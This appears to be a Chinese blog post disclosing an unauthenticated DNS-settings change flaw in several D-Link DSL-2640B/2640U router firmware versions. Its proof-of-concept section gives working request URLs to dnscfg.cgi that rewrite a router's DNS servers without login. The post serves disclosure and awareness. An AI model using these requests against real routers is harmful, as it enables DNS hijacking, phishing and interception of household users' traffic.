AD

D-Link多种型号ADSL_DSL设备未授权修改DNS配置

  漏洞说明:
       D-Link ADSL DSL的WEB管理应用,存在一个未授权即可修改配置的漏洞。攻击者可以直接利用该漏洞,修改用户的DSL设备DNS,从而进行中间人攻击、钓鱼。

影响范围:
        DSL-2640B SEA_1.01
        DSL-2640B GE_1.07
        DSL-2640U IM_1.00

POC:
       直接请求如下形式的URL即可:
       D-Link ADSL DSL-2640B
       http://url/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1

       DSL-2640B GE_1.07
       http://url/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1

       DSL-2640U IM_1.00
       http://url/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1



评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce